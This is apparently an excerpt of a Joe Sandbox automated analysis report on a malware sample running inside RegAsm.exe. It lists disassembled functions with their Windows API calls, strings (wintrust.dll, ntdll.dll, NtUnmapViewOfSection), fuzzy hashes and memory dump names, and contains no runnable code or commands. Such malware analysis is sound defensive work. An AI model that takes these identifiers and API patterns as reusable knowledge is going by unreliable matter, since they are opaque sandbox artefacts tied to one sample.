Instruction Fuzzy Hash: 9B31E5B17047009BC700DF5984417AEF7E5AFC660CF14842DE8695BB81EB70994AD793

Function 6C0BF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C0BF480

Part of subcall function 6C08F100: LoadLibraryW.KERNEL32(shell32,?,6C0FD020), ref: 6C08F122
Part of subcall function 6C08F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C08F132

CloseHandle.KERNEL32(00000000), ref: 6C0BF555

Part of subcall function 6C0914B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C091248,6C091248,?), ref: 6C0914C9
Part of subcall function 6C0914B0: memcpy.VCRUNTIME140(?,6C091248,00000000,?,6C091248,?), ref: 6C0914EF

Part of subcall function 6C08EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C08EEE3

CreateFileW.KERNEL32 ref: 6C0BF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C0BF523

Strings

\oleacc.dll, xrefs: 6C0BF4CB

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 916b2a5513582284f9efa42540b4816ced34361671ca084252365ad05ce7e73a
Instruction ID: a693e0ca788c428e9f2915253955e987acab33f5415b3b12a11def7069aece59
Opcode Fuzzy Hash: 916b2a5513582284f9efa42540b4816ced34361671ca084252365ad05ce7e73a
Instruction Fuzzy Hash: 0B41C3346087109FE720DF79C984B9BB7F8AF45318F504A1CF69093650EB71E989CB92

Function 6C0C0210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0C0222
moz_xmalloc.MOZGLUE(0000000C), ref: 6C0C0231

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0C028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C0C02F7

Strings

@, xrefs: 6C0C02D8

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: a23afd05c8ac0b80962dc33aa3b779e456f5185a3f4d2f212e6bbeafccbc5a3b
Instruction ID: 8db7857a869af894ca765ad994230b56001475dfa0ef254c9dd43915f072a3e2
Opcode Fuzzy Hash: a23afd05c8ac0b80962dc33aa3b779e456f5185a3f4d2f212e6bbeafccbc5a3b
Instruction Fuzzy Hash: 63319DB2B046518FEB54CF58C880B1AB7E5FF44718B14862DDA6ADBB81D731EC01CB82

Function 0041BFC6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C019
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C58F,?,00416F27), ref: 0041C049
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C075
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C083

Part of subcall function 0041B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00CD2548), ref: 0041B9C5

Strings

'oA, xrefs: 0041BFD6

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID: 'oA
API String ID: 3986731826-570265369
Opcode ID: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction ID: 1898f3f14c485dfe9e4ef6ed33e1055e23cef853a536fbea19f5c84a704e6684
Opcode Fuzzy Hash: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction Fuzzy Hash: DA416D71800209DFCF14DFA9C880AEEBFF9FF48310F10416AE855EA256E3359985CBA4

Function 6C0CE020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CE047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CE04F

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0CE09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0CE0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C0CE057

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: 306ea99147d3d3b3d460221db80afb8c73970ec23b6f1f6a84e0610870f77448
Instruction ID: d0144a9c8c3cac107231786cbc9459a3ebe0cf4914932fd96a4ae4d0dea80268
Opcode Fuzzy Hash: 306ea99147d3d3b3d460221db80afb8c73970ec23b6f1f6a84e0610870f77448
Instruction Fuzzy Hash: 2C21BE74B001088FDF00DF64C859BAEBBF5AF85208F244428ED1AA7741DB35E949CBE2

Function 6C0E74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C0E7526
__Init_thread_footer.LIBCMT ref: 6C0E7566
__Init_thread_footer.LIBCMT ref: 6C0E7597

Strings

UnmapViewOfFile2, xrefs: 6C0E7552
kernel32.dll, xrefs: 6C0E7557

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 75eb8614c7962ca39cad65105d5f45ec7b6f7ab00b9c05b2dab57f3d66a4f1db
Instruction ID: 5753bc2c6904b598005e36a7e46dd04b0612e246413d427ea3a3ba542fe06b48
Opcode Fuzzy Hash: 75eb8614c7962ca39cad65105d5f45ec7b6f7ab00b9c05b2dab57f3d66a4f1db
Instruction Fuzzy Hash: 07212576741501AFCA14CBAD880AF5933F5EB8A36AB10452CE82157B41CF31B802CA9B

Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
_memmove.LIBCMT ref: 0040F320

Strings

invalid string position, xrefs: 0040F2C2
string too long, xrefs: 0040F2E1

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction ID: 57eaf4f8ed72a9c9f24929b0a4870ba8c902719b5e729f6aa90dd4ccac796c9b
Opcode Fuzzy Hash: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction Fuzzy Hash: 6611E0713002029FCB24DF6DD881A59B3A5BF45324754053AF816EBAC2C7B8ED498799

Function 6C0EA7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10F770,-00000001,?,6C0FE330,?,6C0ABDF7), ref: 6C0EA7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C0ABDF7), ref: 6C0EA7C2
moz_xmalloc.MOZGLUE(00000018,?,6C0ABDF7), ref: 6C0EA7E4
LeaveCriticalSection.KERNEL32(6C10F770), ref: 6C0EA80A

Strings

accelerator.dll, xrefs: 6C0EA7BF

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 8c80f2347482e8db4be3589562e58db2643bcca4c0d5eb006beb698dc7648fa9
Instruction ID: f84bd3430447d690c5ff0793a40c3e5907d716290eb741c4366dbdbe976c76ed
Opcode Fuzzy Hash: 8c80f2347482e8db4be3589562e58db2643bcca4c0d5eb006beb698dc7648fa9
Instruction Fuzzy Hash: 87018F707043049F9B04CF56D885E127BF8FF8E355714806EE8598B701DF70A904CBA1

Function 6C08F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C08EE51,?), ref: 6C08F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C08F0C2

Strings

Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C08F0DC
ole32, xrefs: 6C08F0AD
Could not find CoTaskMemFree, xrefs: 6C08F0E3

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 41ec8479fff35030fdb8fae6ef923f17689e0bd7c11287a932715b16d8290b75
Instruction ID: 3a69f0ce607e5c7669878448c16a1649f4de800b6da07c948d93867f4a1d2731
Opcode Fuzzy Hash: 41ec8479fff35030fdb8fae6ef923f17689e0bd7c11287a932715b16d8290b75
Instruction Fuzzy Hash: CCE04F707862019FAF146AB6980DB2B37FDAB1624D374CA2DF512D1E41EF24E4109A66

Function 6C0C0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C097204), ref: 6C0C0088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C0C00A7
FreeLibrary.KERNEL32(?,6C097204), ref: 6C0C00BE

Strings

CryptCATAdminAcquireContext2, xrefs: 6C0C00A1
wintrust.dll, xrefs: 6C0C0083

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: bed7cd6b9c6e1092d03dbb415a758c4cb59452b9e7a6992d257b3d7d8fa6b5ab
Instruction ID: 1a06cc2141a2a391fd79b44e35f32813a8ef36f61a93c180e47bef2863934f56
Opcode Fuzzy Hash: bed7cd6b9c6e1092d03dbb415a758c4cb59452b9e7a6992d257b3d7d8fa6b5ab
Instruction Fuzzy Hash: F2E092B47453059BEF10AF66980978A7AFCB70B349F60801EA924C2650DFB4C024EB1A

Function 6C0C00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C097235), ref: 6C0C00D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C0C00F7
FreeLibrary.KERNEL32(?,6C097235), ref: 6C0C010E

Strings

wintrust.dll, xrefs: 6C0C00D3
CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C0C00F1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: a5aa76e24c3e3805aa704498d79bac52f862ea3c70f9b14ee61ad698eef1c5ba
Instruction ID: 8f4ef37b51ab3dab6e23ef71529520281d99c90c80343ca97d4ed995f40f32f0
Opcode Fuzzy Hash: a5aa76e24c3e3805aa704498d79bac52f862ea3c70f9b14ee61ad698eef1c5ba
Instruction Fuzzy Hash: 83E09AB47493059BEF009F65890A7657AFDF70774DF68401EA95981640DF748050EB15

Function 6C0C0120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C097297), ref: 6C0C0128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C0C0147
FreeLibrary.KERNEL32(?,6C097297), ref: 6C0C015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6C0C0141
wintrust.dll, xrefs: 6C0C0123

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: 894e2c76c9ea6c83716fd3f62c74040af9b1f2cc31f6c7e881b388887a0023e2
Instruction ID: 57395a68e5e601f669729fe6f68157522539c32c43a59d70e9fa4bad7d62535f
Opcode Fuzzy Hash: 894e2c76c9ea6c83716fd3f62c74040af9b1f2cc31f6c7e881b388887a0023e2
Instruction Fuzzy Hash: 24E01AB03092849BEF006F2AC80D74A7AFCF707748F10401EA915C2740DF70C014EB19

Function 6C0C0170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C097308), ref: 6C0C0178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C0C0197
FreeLibrary.KERNEL32(?,6C097308), ref: 6C0C01AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6C0C0191
wintrust.dll, xrefs: 6C0C0173

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: a89703c371a5ef40a9a4995bee947616bf2f39c9c25ed91cdd947317fe2f1856
Instruction ID: 980adf849c4173985c827a55e815075f6017413381bb27bdc7de9952e3713724
Opcode Fuzzy Hash: a89703c371a5ef40a9a4995bee947616bf2f39c9c25ed91cdd947317fe2f1856
Instruction Fuzzy Hash: 5DE0E5B07862089AEB009F258919B457BFCB706649F14005FE9A581680DF708090EA65

Function 6C0C01C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C097266), ref: 6C0C01C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C0C01E7
FreeLibrary.KERNEL32(?,6C097266), ref: 6C0C01FE

Strings

wintrust.dll, xrefs: 6C0C01C3
CryptCATAdminReleaseContext, xrefs: 6C0C01E1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: b5b37e378e0c050fb00154c309994fd3be035287114d075e01ee816a30ff53c7
Instruction ID: c00d1e52d9ccc6fdf2ee4316105bc8e11299d5e977c5e7789af4b54da20863cd
Opcode Fuzzy Hash: b5b37e378e0c050fb00154c309994fd3be035287114d075e01ee816a30ff53c7
Instruction Fuzzy Hash: 8CE09AB47853869BEF006F6688097467BFCBB07789F50441EEE25C1680DFB08010EF15

Function 6C0EC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C0EC0E9), ref: 6C0EC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C0EC437
FreeLibrary.KERNEL32(?,6C0EC0E9), ref: 6C0EC44C

Strings

NtQueryVirtualMemory, xrefs: 6C0EC431
ntdll.dll, xrefs: 6C0EC413

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 4124ff57964cfb76a52d9cb2a8a898034b5dd3af775af5c80b735c0e20a53fce
Instruction ID: 0e82f6c6b4b3312fc566f6ea3f4cbb3983609689fd7a13408ab678b9cdac2cac
Opcode Fuzzy Hash: 4124ff57964cfb76a52d9cb2a8a898034b5dd3af775af5c80b735c0e20a53fce
Instruction Fuzzy Hash: 63E0B6B07053019BDF00BF71C909B527FF8B70A648F10411FAA2491640EFB5C031EB58

Function 6C0E75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C0E748B,?), ref: 6C0E75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C0E75D7
FreeLibrary.KERNEL32(?,6C0E748B,?), ref: 6C0E75EC

Strings

RtlNtStatusToDosError, xrefs: 6C0E75D1
ntdll.dll, xrefs: 6C0E75B3

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: d5c4253c4eed8865830d55c42bcc56a653159fce9b69e9a316a9f3af2b85f5c3
Instruction ID: ce9233d2b4921e870652512c5ccbf0d38ac14c4155dd566da679ac57de7860ba
Opcode Fuzzy Hash: d5c4253c4eed8865830d55c42bcc56a653159fce9b69e9a316a9f3af2b85f5c3
Instruction Fuzzy Hash: 09E0B671740301AFEF016FA6C88E7027AF8EB0B25AF10802DFA15E1641EFB48041EF1A

Function 6C0E7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C0E7592), ref: 6C0E7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C0E7627
FreeLibrary.KERNEL32(?,6C0E7592), ref: 6C0E763C

Strings

NtUnmapViewOfSection, xrefs: 6C0E7621
ntdll.dll, xrefs: 6C0E7603

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
